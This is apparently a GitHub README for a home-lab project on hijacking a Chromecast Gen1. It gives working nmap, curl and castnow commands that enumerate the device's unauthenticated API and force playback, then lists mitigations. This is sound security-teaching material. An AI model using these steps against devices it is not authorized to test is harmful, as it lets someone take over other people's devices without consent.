Skip to content

Nick-Robb/Chromecast-IoT-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
README.md
README.md
Β 
Β 

Repository files navigation

Chromecast Gen1 IoT Exploitation Lab

This project demonstrates the discovery, enumeration, and exploitation of a vulnerable IoT device (Google Chromecast Gen1) in a home lab environment. The testing was performed with full authorization on a personal network to simulate real-world conditions.

βš™οΈ Objective

  • Identify a vulnerable IoT device on a local network
  • Enumerate available services and protocols
  • Exploit unauthenticated APIs to control device behavior
  • Validate the risk with minimal tooling and no password access

πŸ” Summary

During a routine scan of a trusted home network, an old Chromecast Gen1 was discovered with multiple insecure configurations. Using only Nmap, curl, and castnow, the device was remotely controlled without any authentication, including forcing media playback and switching the TV input via HDMI-CEC.

🧰 Tools Used

Tool Purpose
Nmap Port scanning and SSL enumeration
OpenVAS Vulnerability scanning
Curl Manual API interrogation
Castnow Remote media casting
openssl TLS version and cipher testing

πŸ“‹ Technical Steps

1. Discovery & Port Scan

nmap -p 8008,8009,8443,9000 --open 192.168.10.0/24

Result: Chromecast found on 192.168.10.79

2. TLS Inspection

nmap -p 8443 --script ssl-enum-ciphers 192.168.10.79
openssl s_client -connect 192.168.10.79:8443 -tls1

Findings:

  • Supports TLS 1.0 / SHA1 cert
  • Weak ciphers (rated F)

3. API Enumeration

curl http://192.168.10.79:8008/setup/eureka_info
curl http://192.168.10.79:8008/ssdp/device-desc.xml

Revealed:

  • Device name, model, firmware, public keys
  • API exposed with no authentication

4. Exploitation – Force Media Playback

sudo apt install nodejs npm -y
sudo npm install -g castnow
castnow --address 192.168.10.79 https://www.soundhelix.com/examples/mp3/SoundHelix-Song-1.mp3

Result:

  • Chromecast accepted the command
  • TV input switched via HDMI-CEC
  • Playback began without user consent

5. Stop Playback

castnow --address 192.168.10.79 --quit
curl -X DELETE http://192.168.10.79:8008/apps/YouTube

πŸ›‘οΈ Key Takeaways

  • Many legacy IoT devices still expose unauthenticated APIs
  • Old TLS versions and SHA1 certificates remain in active use
  • HDMI-CEC can be abused to switch inputs and seize control
  • Simple, publicly available tools can compromise consumer-grade devices without brute force or phishing

🧠 Lessons Learned

  • Vulnerability scanning is only the start β€” real-world validation matters
  • IoT devices are often the softest target in any network
  • Full control can be achieved with minimal noise or credentials

πŸ“› Mitigation

  • Remove or isolate legacy devices like Chromecast Gen1
  • Segment IoT networks using VLANs or guest Wi-Fi
  • Disable HDMI-CEC if not needed
  • Monitor for unexpected LAN device behavior

About

Compromising an old IoT in the wild!

Topics

chromecast cybersecurity nmap penetration-testing pentesting openvas iot-security vulnerability-assessment ethical-hacking network-security

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published